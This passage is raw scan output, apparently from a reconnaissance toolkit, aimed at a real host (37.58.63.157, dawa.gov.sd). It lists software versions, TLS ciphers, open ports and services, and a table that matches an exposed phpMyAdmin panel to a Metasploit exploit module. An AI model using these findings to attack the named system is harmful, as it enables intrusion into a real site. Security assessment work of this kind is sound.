2207. Name Link Software
2208. wpscan https://github.com/wpscanteam/wpscan WordPress
2209. CMSmap https://github.com/Dionach/CMSmap WordPress
2210.  
2211. ____________________________________________________________________________________________
2212. Time: 1.1 sec Urls: 522 Fingerprints: 40401
2213. #######################################################################################################################################
2214. HTTP/1.1 200 OK
2215. Date: Thu, 02 May 2019 11:32:49 GMT
2216. Content-Type: text/html; charset=UTF-8
2217. X-Powered-By: PHP/7.0.33
2218. Vary: Accept-Encoding,Cookie
2219. Cache-Control: max-age=3, must-revalidate
2220. X-Cache-Status: MISS
2221. X-Powered-By: PleskLin
2222. Connection: keep-alive
2223.  
2224. HTTP/1.1 200 OK
2225. Date: Thu, 02 May 2019 11:32:50 GMT
2226. Content-Type: text/html; charset=UTF-8
2227. X-Powered-By: PHP/7.0.33
2228. Vary: Accept-Encoding,Cookie
2229. Cache-Control: max-age=3, must-revalidate
2230. X-Cache-Status: HIT
2231. X-Powered-By: PleskLin
2232. Connection: keep-alive
2233. #######################################################################################################################################
2234. OWL Carousel
2235. PHP 7.0.33
2236. WordPress Super Cache
2237. Revslider
2238. jQuery 1.12.4
2239. jQuery Migrate
2240. Underscore.js 1.8.3
2241. WordPress
2242. X-Cache-Status: STALE
2243. #######################################################################################################################################
2244. https://37.58.63.157 [301 Moved Permanently] Country[GERMANY][DE], HTTPServer[nginx], IP[37.58.63.157], PHP[7.0.33,], Plesk[Lin], RedirectLocation[https://dawa.gov.sd/], UncommonHeaders[x-cache-status], X-Powered-By[PHP/7.0.33, PleskLin], nginx
2245. https://dawa.gov.sd/ [200 OK] Country[GERMANY][DE], HTML5, HTTPServer[nginx], IP[37.58.63.157], JQuery[1.12.4], MetaGenerator[Powered by Slider Revolution 5.2.3.5 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface.,Powered by Visual Composer - drag and drop page builder for WordPress.,WordPress 5.0.4], PHP[7.0.33,], Plesk[Lin], PoweredBy[Slider,Visual], Script[text/javascript], UncommonHeaders[x-cache-status], WordPress[5.0.4], WordpressSuperCache, X-Powered-By[PHP/7.0.33, PleskLin], nginx
2246. #######################################################################################################################################
2247. OWL Carousel
2248. PHP 7.0.33
2249. WordPress Super Cache
2250. Revslider
2251. jQuery 1.12.4
2252. jQuery Migrate
2253. Underscore.js 1.8.3
2254. WordPress
2255. X-Cache-Status: MISS
2256. #######################################################################################################################################
2257. Version: 1.11.13-static
2258. OpenSSL 1.0.2-chacha (1.0.2g-dev)
2259.  
2260. Connected to 37.58.63.157
2261.  
2262. Testing SSL server 37.58.63.157 on port 443 using SNI name 37.58.63.157
2263.  
2264. TLS Fallback SCSV:
2265. Server supports TLS Fallback SCSV
2266.  
2267. TLS renegotiation:
2268. Secure session renegotiation supported
2269.  
2270. TLS Compression:
2271. Compression disabled
2272.  
2273. Heartbleed:
2274. TLS 1.2 not vulnerable to heartbleed
2275. TLS 1.1 not vulnerable to heartbleed
2276. TLS 1.0 not vulnerable to heartbleed
2277.  
2278. Supported Server Cipher(s):
2279. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
2280. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
2281. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
2282. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
2283. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2284. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2285. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
2286. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
2287. Accepted TLSv1.2 128 bits AES128-SHA256
2288. Accepted TLSv1.2 256 bits AES256-SHA256
2289. Accepted TLSv1.2 128 bits AES128-SHA
2290. Accepted TLSv1.2 256 bits AES256-SHA
2291. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
2292. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
2293. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2294. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2295. Accepted TLSv1.1 128 bits AES128-SHA
2296. Accepted TLSv1.1 256 bits AES256-SHA
2297. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
2298. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
2299. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2300. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2301. Accepted TLSv1.0 128 bits AES128-SHA
2302. Accepted TLSv1.0 256 bits AES256-SHA
2303. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
2304. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
2305.  
2306. SSL Certificate:
2307. Signature Algorithm: sha256WithRSAEncryption
2308. RSA Key Strength: 2048
2309.  
2310. Subject: Plesk
2311. Issuer: Plesk
2312.  
2313. Not valid before: Jan 25 15:00:17 2017 GMT
2314. Not valid after: Jan 25 15:00:17 2018 GMT
2315. #######################################################################################################################################
2316. --------------------------------------------------------
2317. <<<Yasuo discovered following vulnerable applications>>>
2318. --------------------------------------------------------
2319. +------------+---------------------------------------+--------------------------------------------------+----------+----------+
2320. | App Name | URL to Application | Potential Exploit | Username | Password |
2321. +------------+---------------------------------------+--------------------------------------------------+----------+----------+
2322. | phpMyAdmin | https://37.58.63.157:8443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
2323. +------------+---------------------------------------+--------------------------------------------------+----------+----------+
2324. #######################################################################################################################################
2325. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:42 EDT
2326. NSE: Loaded 148 scripts for scanning.
2327. NSE: Script Pre-scanning.
2328. NSE: Starting runlevel 1 (of 2) scan.
2329. Initiating NSE at 07:42
2330. Completed NSE at 07:42, 0.00s elapsed
2331. NSE: Starting runlevel 2 (of 2) scan.
2332. Initiating NSE at 07:42
2333. Completed NSE at 07:42, 0.00s elapsed
2334. Initiating Ping Scan at 07:42
2335. Scanning 37.58.63.157 [4 ports]
2336. Completed Ping Scan at 07:42, 0.06s elapsed (1 total hosts)
2337. Initiating Parallel DNS resolution of 1 host. at 07:42
2338. Completed Parallel DNS resolution of 1 host. at 07:42, 0.03s elapsed
2339. Initiating Connect Scan at 07:42
2340. Scanning 37.58.63.157 [65535 ports]
2341. Discovered open port 995/tcp on 37.58.63.157
2342. Discovered open port 993/tcp on 37.58.63.157
2343. Discovered open port 110/tcp on 37.58.63.157
2344. Discovered open port 143/tcp on 37.58.63.157
2345. Discovered open port 443/tcp on 37.58.63.157
2346. Discovered open port 80/tcp on 37.58.63.157
2347. Discovered open port 53/tcp on 37.58.63.157
2348. Discovered open port 22/tcp on 37.58.63.157
2349. Discovered open port 3306/tcp on 37.58.63.157
2350. Discovered open port 21/tcp on 37.58.63.157
2351. Increasing send delay for 37.58.63.157 from 0 to 5 due to max_successful_tryno increase to 5
2352. Connect Scan Timing: About 6.85% done; ETC: 07:50 (0:07:02 remaining)
2353. Discovered open port 465/tcp on 37.58.63.157
2354. Connect Scan Timing: About 15.42% done; ETC: 07:49 (0:05:34 remaining)
2355. Connect Scan Timing: About 24.08% done; ETC: 07:48 (0:04:47 remaining)
2356. Connect Scan Timing: About 32.82% done; ETC: 07:48 (0:04:08 remaining)
2357. Discovered open port 8443/tcp on 37.58.63.157
2358. Connect Scan Timing: About 41.81% done; ETC: 07:48 (0:03:30 remaining)
2359. Discovered open port 8880/tcp on 37.58.63.157
2360. Connect Scan Timing: About 50.51% done; ETC: 07:48 (0:02:57 remaining)
2361. Connect Scan Timing: About 59.47% done; ETC: 07:48 (0:02:24 remaining)
2362. Discovered open port 106/tcp on 37.58.63.157
2363. Connect Scan Timing: About 68.18% done; ETC: 07:48 (0:01:53 remaining)
2364. Discovered open port 4190/tcp on 37.58.63.157
2365. Connect Scan Timing: About 77.10% done; ETC: 07:48 (0:01:21 remaining)
2366. Discovered open port 7081/tcp on 37.58.63.157
2367. Discovered open port 7080/tcp on 37.58.63.157
2368. Connect Scan Timing: About 85.61% done; ETC: 07:48 (0:00:51 remaining)
2369. Completed Connect Scan at 07:48, 350.50s elapsed (65535 total ports)
2370. Initiating Service scan at 07:48
2371. Scanning 17 services on 37.58.63.157
2372. Completed Service scan at 07:49, 32.54s elapsed (17 services on 1 host)
2373. Initiating OS detection (try #1) against 37.58.63.157
2374. adjust_timeouts2: packet supposedly had rtt of -136625 microseconds. Ignoring time.
2375. adjust_timeouts2: packet supposedly had rtt of -136625 microseconds. Ignoring time.
2376. adjust_timeouts2: packet supposedly had rtt of -137808 microseconds. Ignoring time.
2377. adjust_timeouts2: packet supposedly had rtt of -137808 microseconds. Ignoring time.
2378. adjust_timeouts2: packet supposedly had rtt of -133125 microseconds. Ignoring time.
2379. adjust_timeouts2: packet supposedly had rtt of -133125 microseconds. Ignoring time.
2380. adjust_timeouts2: packet supposedly had rtt of -138179 microseconds. Ignoring time.
2381. adjust_timeouts2: packet supposedly had rtt of -138179 microseconds. Ignoring time.
2382. Retrying OS detection (try #2) against 37.58.63.157
2383. Initiating Traceroute at 07:49
2384. Completed Traceroute at 07:49, 3.02s elapsed
2385. Initiating Parallel DNS resolution of 13 hosts. at 07:49
2386. Completed Parallel DNS resolution of 13 hosts. at 07:49, 2.53s elapsed
2387. NSE: Script scanning 37.58.63.157.
2388. NSE: Starting runlevel 1 (of 2) scan.
2389. Initiating NSE at 07:49
2390. NSE Timing: About 99.87% done; ETC: 07:49 (0:00:00 remaining)
2391. NSE Timing: About 99.96% done; ETC: 07:50 (0:00:00 remaining)
2392. Completed NSE at 07:50, 71.56s elapsed
2393. NSE: Starting runlevel 2 (of 2) scan.
2394. Initiating NSE at 07:50
2395. Completed NSE at 07:50, 0.25s elapsed
2396. Nmap scan report for 37.58.63.157
2397. Host is up, received reset ttl 64 (0.11s latency).
2398. Scanned at 2019-05-02 07:42:38 EDT for 465s
2399. Not shown: 65514 closed ports
2400. Reason: 65514 conn-refused
2401. PORT STATE SERVICE REASON VERSION
2402. 21/tcp open ftp syn-ack ProFTPD
2403. |_ssl-date: TLS randomness does not represent time
2404. | tls-nextprotoneg:
2405. |_ ftp
2406. 22/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0)
2407. | ssh-hostkey:
2408. | 2048 f9:ea:f1:f9:88:4c:35:23:4f:31:fb:38:17:f9:40:39 (RSA)
2409. | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3l/kUy/897AH6EzaGubX/bboIh1vUwfAnrYQFKU4JiMHp6oNlfBwXiwvxsjYfIcqw3fmmEV8WaSXDyiERmiHQJqoKGzPaKkwtJGKG48bl7M8F/Y+xTM3C9a7zLSn2KzRehJ6SHYsAOmdOnJHmK20803k+g1GlSixlcDShLeiKz5DljHmiVHPaXVYkpl5JcQpkUcYmGW5VtEyDdij4goxzD/yaY946cvbrfPNBgVy02mMzq2EW8qcOIcihGqHMglyn2jauXxT5vAj0qNnU3Ax1B+iMKbOtQikVaYyG9IVDMHzox1Ry1j03Sr3VZ6cQe0MY4y8kqMCaC5ElbWWxVRuX
2410. | 256 8c:07:13:65:fe:ef:69:09:f4:fb:ee:49:91:5a:33:38 (ECDSA)
2411. | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLZq/2Kk+lIuuUNmtWRYKrBiV0JPMiVqGL/c7knbY/zCoWbc8Qh/mBiQ2iXwLAlzzRZt02NYtNqfk/bG7FrvJWY=
2412. | 256 37:44:b4:9d:a4:1f:48:a1:d0:60:fe:4a:73:6c:99:67 (ED25519)
2413. |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHWJuHfj/3xMs2nwlu258i9yXQA6hIAhJIB9TVJdkz1o
2414. 53/tcp open domain syn-ack (unknown banner: none)
2415. | dns-nsid:
2416. |_ bind.version: none
2417. | fingerprint-strings:
2418. | DNSVersionBindReqTCP:
2419. | version
2420. | bind
2421. |_ none
2422. 80/tcp open http-proxy syn-ack Squid http proxy
2423. |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
2424. |_http-generator: WordPress 5.0.4
2425. | http-methods:
2426. |_ Supported Methods: GET HEAD POST OPTIONS
2427. |_http-open-proxy: Proxy might be redirecting requests
2428. | http-robots.txt: 1 disallowed entry
2429. |_/wp-admin/
2430. |_http-title: \xD8\xA7\xD9\x84\xD9\x85\xD8\xAC\xD9\x84\xD8\xB3 \xD8\xA7\xD9\x84\xD8\xA3\xD8\xB9\xD9\x84\xD9\x89 \xD9\x84\xD9\x84\xD8\xAF\xD8\xB9\xD9\x88\xD8\xA9 \xD9\x88\xD8\xA7\xD9\x84\xD8\xA5\xD8\xB1\xD8\xB4\xD8\xA7\xD8\xAF
2431. 106/tcp open pop3pw syn-ack poppassd
2432. 110/tcp open pop3 syn-ack Dovecot pop3d
2433. |_pop3-capabilities: APOP PIPELINING USER STLS SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) CAPA AUTH-RESP-CODE RESP-CODES UIDL TOP
2434. | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2435. | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2436. | Public Key type: rsa
2437. | Public Key bits: 2048
2438. | Signature Algorithm: sha256WithRSAEncryption
2439. | Not valid before: 2017-01-25T15:00:17
2440. | Not valid after: 2018-01-25T15:00:17
2441. | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
2442. | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
2443. | -----BEGIN CERTIFICATE-----
2444. | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
2445. | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
2446. | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
2447. | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
2448. | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
2449. | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
2450. | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
2451. | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
2452. | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
2453. | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
2454. | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
2455. | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
2456. | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
2457. | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
2458. | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
2459. | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
2460. | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
2461. | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
2462. | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
2463. |_-----END CERTIFICATE-----
2464. |_ssl-date: TLS randomness does not represent time
2465. 135/tcp filtered msrpc no-response
2466. 136/tcp filtered profile no-response
2467. 137/tcp filtered netbios-ns no-response
2468. 138/tcp filtered netbios-dgm no-response
2469. 143/tcp open imap syn-ack Dovecot imapd
2470. |_imap-capabilities: SASL-IR Pre-login OK STARTTLS capabilities AUTH=LOGIN LITERAL+ more AUTH=PLAIN LOGIN-REFERRALS post-login listed have IDLE IMAP4rev1 ID AUTH=DIGEST-MD5 ENABLE AUTH=CRAM-MD5A0001
2471. | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2472. | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2473. | Public Key type: rsa
2474. | Public Key bits: 2048
2475. | Signature Algorithm: sha256WithRSAEncryption
2476. | Not valid before: 2017-01-25T15:00:17
2477. | Not valid after: 2018-01-25T15:00:17
2478. | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
2479. | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
2480. | -----BEGIN CERTIFICATE-----
2481. | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
2482. | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
2483. | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
2484. | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
2485. | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
2486. | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
2487. | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
2488. | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
2489. | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
2490. | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
2491. | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
2492. | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
2493. | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
2494. | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
2495. | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
2496. | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
2497. | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
2498. | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
2499. | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
2500. |_-----END CERTIFICATE-----
2501. |_ssl-date: TLS randomness does not represent time
2502. 443/tcp open ssl/http syn-ack nginx
2503. |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
2504. |_http-generator: WordPress 5.0.4
2505. | http-methods:
2506. |_ Supported Methods: GET HEAD POST OPTIONS
2507. | http-robots.txt: 1 disallowed entry
2508. |_/wp-admin/
2509. |_http-server-header: nginx
2510. |_http-title: \xD8\xA7\xD9\x84\xD9\x85\xD8\xAC\xD9\x84\xD8\xB3 \xD8\xA7\xD9\x84\xD8\xA3\xD8\xB9\xD9\x84\xD9\x89 \xD9\x84\xD9\x84\xD8\xAF\xD8\xB9\xD9\x88\xD8\xA9 \xD9\x88\xD8\xA7\xD9\x84\xD8\xA5\xD8\xB1\xD8\xB4\xD8\xA7\xD8\xAF
2511. | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2512. | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2513. | Public Key type: rsa
2514. | Public Key bits: 2048
2515. | Signature Algorithm: sha256WithRSAEncryption
2516. | Not valid before: 2017-01-25T15:00:17
2517. | Not valid after: 2018-01-25T15:00:17
2518. | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
2519. | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
2520. | -----BEGIN CERTIFICATE-----
2521. | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
2522. | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
2523. | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
2524. | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
2525. | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
2526. | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
2527. | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
2528. | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
2529. | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
2530. | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
2531. | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
2532. | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
2533. | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
2534. | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
2535. | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
2536. | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
2537. | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
2538. | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
2539. | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
2540. |_-----END CERTIFICATE-----
2541. |_ssl-date: TLS randomness does not represent time
2542. | tls-alpn:
2543. | h2
2544. |_ http/1.1
2545. | tls-nextprotoneg:
2546. | h2
2547. |_ http/1.1
2548. 465/tcp open ssl/smtps? syn-ack
2549. |_smtp-commands: Couldn't establish connection on port 465
2550. |_ssl-date: TLS randomness does not represent time
2551. 993/tcp open ssl/imap syn-ack Dovecot imapd
2552. |_imap-capabilities: SASL-IR Pre-login OK capabilities AUTH=LOGIN LITERAL+ more IDLE LOGIN-REFERRALS post-login listed have AUTH=CRAM-MD5A0001 IMAP4rev1 ID AUTH=DIGEST-MD5 ENABLE AUTH=PLAIN
2553. | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2554. | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2555. | Public Key type: rsa
2556. | Public Key bits: 2048
2557. | Signature Algorithm: sha256WithRSAEncryption
2558. | Not valid before: 2017-01-25T15:00:17
2559. | Not valid after: 2018-01-25T15:00:17
2560. | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
2561. | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
2562. | -----BEGIN CERTIFICATE-----
2563. | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
2564. | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
2565. | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
2566. | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
2567. | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
2568. | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
2569. | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
2570. | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
2571. | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
2572. | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
2573. | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
2574. | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
2575. | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
2576. | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
2577. | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
2578. | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
2579. | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
2580. | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
2581. | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
2582. |_-----END CERTIFICATE-----
2583. |_ssl-date: TLS randomness does not represent time
2584. 995/tcp open ssl/pop3 syn-ack Dovecot pop3d
2585. |_pop3-capabilities: APOP PIPELINING USER SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) CAPA AUTH-RESP-CODE RESP-CODES UIDL TOP
2586. | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2587. | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2588. | Public Key type: rsa
2589. | Public Key bits: 2048
2590. | Signature Algorithm: sha256WithRSAEncryption
2591. | Not valid before: 2017-01-25T15:00:17
2592. | Not valid after: 2018-01-25T15:00:17
2593. | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
2594. | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
2595. | -----BEGIN CERTIFICATE-----
2596. | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
